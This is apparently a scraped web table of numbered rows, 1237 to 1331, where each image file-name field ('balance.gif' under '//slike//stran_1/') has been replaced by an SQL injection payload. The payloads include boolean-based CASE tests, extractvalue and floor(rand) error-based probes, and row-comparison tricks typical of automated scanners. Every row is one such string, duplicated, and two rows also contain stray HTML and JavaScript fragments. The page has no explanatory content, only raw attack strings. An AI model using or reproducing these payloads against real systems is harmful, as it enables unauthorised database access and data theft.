1237. | 1 | balance.gif rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end))-- nxfy //slike//stran_1/balance.gif rlike (select (case when (2901=2901) then 0x62616c616e63652e676966 else 0x28 end))-- nxfy |
1238. | 1 | balance.gif) and (select (case when (1230=2856) then null else,1230) end) from dual) is null and (7901=7901 //slike//stran_1/balance.gif) and (select (case when (1230=2856) then null else,1230) end) from dual) is null and (7901=7901 |
1239. | 1 | balance.gif) and (select (case when (5881=5881) then null else,5881) end) from dual) is null and (1897=1897 //slike//stran_1/balance.gif) and (select (case when (5881=5881) then null else,5881) end) from dual) is null and (1897=1897 |
1240. | 1 | balance.gif)) and (select (case when (9997=5154) then null else,9997) end) from dual) is null and ((7677=7677 //slike//stran_1/balance.gif)) and (select (case when (9997=5154) then null else,9997) end) from dual) is null and ((7677=7677 |
1241. | 1 | balance.gif)) and (select (case when (5881=5881) then null else,5881) end) from dual) is null and ((9937=9937 //slike//stran_1/balance.gif)) and (select (case when (5881=5881) then null else,5881) end) from dual) is null and ((9937=9937 |
1242. | 1 | balance.gif and (select (case when (9507=7092) then null else,9507) end) from dual) is null //slike//stran_1/balance.gif and (select (case when (9507=7092) then null else,9507) end) from dual) is null |
1243. | 1 | balance.gif and (select (case when (5881=5881) then null else,5881) end) from dual) is null //slike//stran_1/balance.gif and (select (case when (5881=5881) then null else,5881) end) from dual) is null |
1244. | 1 | balance.gif') and (select (case when (7962=8295) then null else,7962) end) from dual) is null and ('trqp'='trqp //slike//stran_1/balance.gif') and (select (case when (7962=8295) then null else,7962) end) from dual) is null and ('trqp'='trqp |
1245. | 1 | balance.gif') and (select (case when (5881=5881) then null else,5881) end) from dual) is null and ('lvgw'='lvgw //slike//stran_1/balance.gif') and (select (case when (5881=5881) then null else,5881) end) from dual) is null and ('lvgw'='lvgw |
1246. | 1 | balance.gif')) and (select (case when (3843=2978) then null else,3843) end) from dual) is null and (('bjvu'='bjvu //slike//stran_1/balance.gif')) and (select (case when (3843=2978) then null else,3843) end) from dual) is null and (('bjvu'='bjvu |
1247. | 1 | balance.gif')) and (select (case when (5881=5881) then null else,5881) end) from dual) is null and (('mhug'='mhug //slike//stran_1/balance.gif')) and (select (case when (5881=5881) then null else,5881) end) from dual) is null and (('mhug'='mhug |
1248. | 1 | balance.gif' and (select (case when (1973=6322) then null else,1973) end) from dual) is null and 'yruj'='yruj //slike//stran_1/balance.gif' and (select (case when (1973=6322) then null else,1973) end) from dual) is null and 'yruj'='yruj |
1249. | 1 | balance.gif' and (select (case when (5881=5881) then null else,5881) end) from dual) is null and 'jcok'='jcok //slike//stran_1/balance.gif' and (select (case when (5881=5881) then null else,5881) end) from dual) is null and 'jcok'='jcok |
1250. | 1 | balance.gif') and (select (case when (4652=7708) then null else,4652) end) from dual) is null and ('jqjk' like 'jqjk //slike//stran_1/balance.gif') and (select (case when (4652=7708) then null else,4652) end) from dual) is null and ('jqjk' like 'jqjk |
1251. | 1 | balance.gif') and (select (case when (5881=5881) then null else,5881) end) from dual) is null and ('kdla' like 'kdla //slike//stran_1/balance.gif') and (select (case when (5881=5881) then null else,5881) end) from dual) is null and ('kdla' like 'kdla |
1252. | 1 | balance.gif%' and (select (case when (9900=8450) then null else,9900) end) from dual) is null and 'oqew%'='oqew //slike//stran_1/balance.gif%' and (select (case when (9900=8450) then null else,9900) end) from dual) is null and 'oqew%'='oqew |
1253. | 1 | balance.gif%' and (select (case when (5881=5881) then null else,5881) end) from dual) is null and 'sqzs%'='sqzs //slike//stran_1/balance.gif%' and (select (case when (5881=5881) then null else,5881) end) from dual) is null and 'sqzs%'='sqzs |
1254. | 1 | balance.gif' and (select (case when (4066=4109) then null else,4066) end) from dual) is null and 'bxly' like 'bxly //slike//stran_1/balance.gif' and (select (case when (4066=4109) then null else,4066) end) from dual) is null and 'bxly' like 'bxly |
1255. | 1 | balance.gif' and (select (case when (5881=5881) then null else,5881) end) from dual) is null and 'qruu' like 'qruu //slike//stran_1/balance.gif' and (select (case when (5881=5881) then null else,5881) end) from dual) is null and 'qruu' like 'qruu |
1256. | 1 | balance.gif") and (select (case when (3367=8535) then null else,3367) end) from dual) is null and ("miky"="miky //slike//stran_1/balance.gif") and (select (case when (3367=8535) then null else,3367) end) from dual) is null and ("miky"="miky |
1257. | 1 | balance.gif") and (select (case when (5881=5881) then null else,5881) end) from dual) is null and ("eqom"="eqom //slike//stran_1/balance.gif") and (select (case when (5881=5881) then null else,5881) end) from dual) is null and ("eqom"="eqom |
1258. | 1 | balance.gif" and (select (case when (6071=3145) then null else,6071) end) from dual) is null and "bmzn"="bmzn //slike//stran_1/balance.gif" and (select (case when (6071=3145) then null else,6071) end) from dual) is null and "bmzn"="bmzn |
1259. | 1 | balance.gif" and (select (case when (5881=5881) then null else,5881) end) from dual) is null and "fjxn"="fjxn //slike//stran_1/balance.gif" and (select (case when (5881=5881) then null else,5881) end) from dual) is null and "fjxn"="fjxn |
1260. | 1 | balance.gif and (select (case when (6099=2551) then null else,6099) end) from dual) is null-- kkaj //slike//stran_1/balance.gif and (select (case when (6099=2551) then null else,6099) end) from dual) is null-- kkaj |
1261. | 1 | balance.gif and (select (case when (5881=5881) then null else,5881) end) from dual) is null-- denr //slike//stran_1/balance.gif and (select (case when (5881=5881) then null else,5881) end) from dual) is null-- denr |
1262. | 1 | (select (case when (2242=6978) then 'balance.gif' else (select 6978 union select 6362) end)) //slike//stran_1/(select (case when (2242=6978) then 'balance.gif' else (select 6978 union select 6362) end)) |
1263. | 1 | (select (case when (3347=3347) then 'balance.gif' else (select 3611 union select 2759) end)) //slike//stran_1/(select (case when (3347=3347) then 'balance.gif' else (select 3611 union select 2759) end)) |
1264. | 1 | (case when (3814=9249) then 3814 else 3814*(select 3814 from dual union select 9249 from dual) end) //slike//stran_1/(case when (3814=9249) then 3814 else 3814*(select 3814 from dual union select 9249 from dual) end) |
1265. | 1 | (case when (1329=1329) then 1329 else 1329*(select 1329 from dual union select 7939 from dual) end) //slike//stran_1/(case when (1329=1329) then 1329 else 1329*(select 1329 from dual union select 7939 from dual) end) |
1266. | 1 | (case when 3946=8853 then 3946 else null end) //slike//stran_1/(case when 3946=8853 then 3946 else null end) |
1267. | 1 | (case when 1244=1244 then 1244 else null end) //slike//stran_1/(case when 1244=1244 then 1244 else null end) |
1268. | 1 | balance.gif,(select (case when (9065=8676) then 1 else 9065*(select 9065 from information_schema.plugins) end)) //slike//stran_1/balance.gif,(select (case when (9065=8676) then 1 else 9065*(select 9065 from information_schema.plugins) end)) |
1269. | 1 | balance.gif,(select (case when (9703=9703) then 1 else 9703*(select 9703 from information_schema.plugins) end)) //slike//stran_1/balance.gif,(select (case when (9703=9703) then 1 else 9703*(select 9703 from information_schema.plugins) end)) |
1270. | 1 | balance.gif,(select (case when (1498=4835) then 1 else 1/(select 0) end)) //slike//stran_1/balance.gif,(select (case when (1498=4835) then 1 else 1/(select 0) end)) |
1271. | 1 | balance.gif,(select (case when (8605=8605) then 1 else 1/(select 0) end)) //slike//stran_1/balance.gif,(select (case when (8605=8605) then 1 else 1/(select 0) end)) |
1272. | 1 | balance.gif) and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (4324=4324 //slike//stran_1/balance.gif) and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (4324=4324 |
1273. | 1 | balance.gif)) and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ((2085=2085 //slike//stran_1/balance.gif)) and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ((2085=2085 |
1274. | 1 | balance.gif and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) //slike//stran_1/balance.gif and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) |
1275. | 1 | balance.gif') and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('mwad'='mwad //slike//stran_1/balance.gif') and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('mwad'='mwad |
1276. | 1 | balance.gif')) and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (('nmbf'='nmbf //slike//stran_1/balance.gif')) and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (('nmbf'='nmbf |
1277. | 1 | balance.gif' and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'ugts'='ugts //slike//stran_1/balance.gif' and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'ugts'='ugts |
1278. | 1 | balance.gif') and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('xvgj' like 'xvgj //slike//stran_1/balance.gif') and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('xvgj' like 'xvgj |
1279. | 1 | balance.gif%' and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'qdlg%'='qdlg //slike//stran_1/balance.gif%' and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'qdlg%'='qdlg |
1280. | 1 | balance.gif' and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'ycyn' like 'ycyn //slike//stran_1/balance.gif' and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'ycyn' like 'ycyn |
1281. | 1 | balance.gif") and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ("pfpd"="pfpd //slike//stran_1/balance.gif") and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ("pfpd"="pfpd |
1282. | 1 | balance.gif" and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and "ecmx"="ecmx //slike//stran_1/balance.gif" and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and "ecmx"="ecmx |
1283. | 1 | balance.gif and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a)-- incm //slike//stran_1/balance.gif and (select 8115 from(select count(*),concat(0x7171707671,(select (elt(8115=8115,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a)-- incm |
1284. | 1 | balance.gif) or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (4952=4952 //slike//stran_1/balance.gif) or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (4952=4952 |
1285. | 1 | balance.gif)) or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ((8594=8594 //slike//stran_1/balance.gif)) or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ((8594=8594 |
1286. | 1 | balance.gif or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) //slike//stran_1/balance.gif or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) |
1287. | 1 | balance.gif') or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('iswd'='iswd //slike//stran_1/balance.gif') or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('iswd'='iswd |
1288. | 1 | balance.gif')) or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (('llhc'='llhc //slike//stran_1/balance.gif')) or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and (('llhc'='llhc |
1289. | 1 | balance.gif' or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'imaj'='imaj //slike//stran_1/balance.gif' or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'imaj'='imaj |
1290. | 1 | balance.gif') or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('bqym' like 'bqym //slike//stran_1/balance.gif') or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ('bqym' like 'bqym |
1291. | 1 | balance.gif%' or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'gppp%'='gppp //slike//stran_1/balance.gif%' or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'gppp%'='gppp |
1292. | 1 | balance.gif' or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'qwmw' like 'qwmw //slike//stran_1/balance.gif' or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'qwmw' like 'qwmw |
1293. | 1 | balance.gif") or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ("hrjc"="hrjc //slike//stran_1/balance.gif") or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and ("hrjc"="hrjc |
1294. | 1 | balance.gif" or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and "qfaj"="qfaj //slike//stran_1/balance.gif" or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) and "qfaj"="qfaj |
1295. | 1 | balance.gif or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a)-- tzhi //slike//stran_1/balance.gif or (select 6618 from(select count(*),concat(0x7171707671,(select (elt(6618=6618,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a)-- tzhi |
1296. | 1 | balance.gif) and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and (5771=5771 //slike//stran_1/balance.gif) and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and (5771=5771 |
1297. | 1 | balance.gif)) and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and ((7209=7209 //slike//stran_1/balance.gif)) and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and ((7209=7209 |
1298. | 1 | balance.gif and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) //slike//stran_1/balance.gif and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) |
1299. | 1 | balance.gif') and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and ('khro'='khro //slike//stran_1/balance.gif') and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and ('khro'='khro |
1300. | 1 | balance.gif')) and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and (('cxmr'='cxmr //slike//stran_1/balance.gif')) and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and (('cxmr'='cxmr |
1301. | 1 | balance.gif' and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and 'wteq'='wteq //slike//stran_1/balance.gif' and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and 'wteq'='wteq |
1302. | 1 | balance.gif') and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and ('ofgc' like 'ofgc //slike//stran_1/balance.gif') and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and ('ofgc' like 'ofgc |
1303. | 1 | balance.gif%' and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and 'wwfd%'='wwfd //slike//stran_1/balance.gif%' and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and 'wwfd%'='wwfd |
1304. | 1 | balance.gif' and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and 'twxw' like 'twxw //slike//stran_1/balance.gif' and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and 'twxw' like 'twxw |
1305. | 1 | balance.gif") and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and ("akno"="akno //slike//stran_1/balance.gif") and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and ("akno"="akno |
1306. | 1 | balance.gif" and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and "gxsf"="gxsf //slike//stran_1/balance.gif" and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871)) and "gxsf"="gxsf |
1307. | 1 | balance.gif and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871))-- vlyi //slike//stran_1/balance.gif and extractvalue(6941,concat(0x5c,0x7171707671,(select (elt(6941=6941,1))),0x7170767871))-- vlyi |
1308. | 1 | balance.gif) or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and (2728=2728 //slike//stran_1/balance.gif) or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and (2728=2728 |
1309. | 1 | balance.gif)) or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and ((5721=5721 //slike//stran_1/balance.gif)) or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and ((5721=5721 |
1310. | 1 | balance.gif or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) //slike//stran_1/balance.gif or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) |
1311. | 1 | balance.gif') or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and ('ncrh'='ncrh //slike//stran_1/balance.gif') or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and ('ncrh'='ncrh |
1312. | 1 | balance.gif')) or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and (('jggv'='jggv //slike//stran_1/balance.gif')) or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and (('jggv'='jggv |
1313. | 1 | balance.gif' or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and 'rkcv'='rkcv //slike//stran_1/balance.gif' or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and 'rkcv'='rkcv |
1314. | 1 | balance.gif') or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and ('vwtk' like 'vwtk //slike//stran_1/balance.gif') or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and ('vwtk' like 'vwtk |
1315. | 1 | balance.gif%' or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and 'mzda%'='mzda //slike//stran_1/balance.gif%' or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and 'mzda%'='mzda |
1316. | 1 | balance.gif' or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and 'djmw' like 'djmw //slike//stran_1/balance.gif' or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and 'djmw' like 'djmw |
1317. | 1 | balance.gif") or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and ("kgbs"="kgbs //slike//stran_1/balance.gif") or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and ("kgbs"="kgbs |
1318. | 1 | balance.gif" or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and "zlte"="zlte //slike//stran_1/balance.gif" or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871)) and "zlte"="zlte |
1319. | 1 | balance.gif or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871))-- mhcv //slike//stran_1/balance.gif or extractvalue(6591,concat(0x5c,0x7171707671,(select (elt(6591=6591,1))),0x7170767871))-- mhcv |
1320. | 1 | balance.gif) and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and (2375=2375 //slike//stran_1/balance.gif) and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and (2375=2375 |
1321. | 1 | balance.gif)) and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and ((4053=4053 //slike//stran_1/balance.gif)) and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and ((4053=4053 |
1322. | 1 | balance.gif and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) //slike//stran_1/balance.gif and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) |
1323. | 1 | balance.gif') and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and ('fxvf'='fxvf //slike//stran_1/balance.gif') and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and ('fxvf'='fxvf |
1324. | 1 | balance.gif')) and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and (('xdqw'='xdqw //slike//stran_1/balance.gif')) and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and (('xdqw'='xdqw |
1325. | 1 | balance.gif' and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and 'cuwi'='cuwi //slike//stran_1/balance.gif' and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and 'cuwi'='cuwi |
1326. | 1 | balance.gif') and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and ('ydrc' like 'ydrc //slike//stran_1/balance.gif') and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and ('ydrc' like 'ydrc |
1327. | 1 | balance.gif%' and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and 'sqvq%'='sqvq //slike//stran_1/balance.gif%' and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and 'sqvq%'='sqvq |
1328. | 1 | balance.gif' and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and 'qlnx' like 'qlnx //slike//stran_1/balance.gif' and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and 'qlnx' like 'qlnx |
1329. | 1 | (select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and ("ebuk"="ebuk','','scrollbars=1,resizable=1');">balance.gif") and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and ("ebuk"="ebuk //slike//stran_1/balance.gif") and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and ("ebuk"="ebuk |
1330. | 1 | (select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and "srcu"="srcu','','scrollbars=1,resizable=1');">balance.gif" and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and "srcu"="srcu //slike//stran_1/balance.gif" and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x) and "srcu"="srcu |
1331. | 1 | balance.gif and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x)-- wxrv //slike//stran_1/balance.gif and row(1150,5748)>(select count(*),concat(0x7171707671,(select (elt(1150=1150,1))),0x7170767871,floor(rand(0)*2))x from (select 4543 union select 2775 union select 8906 union select 5444)a group by x)-- wxrv |
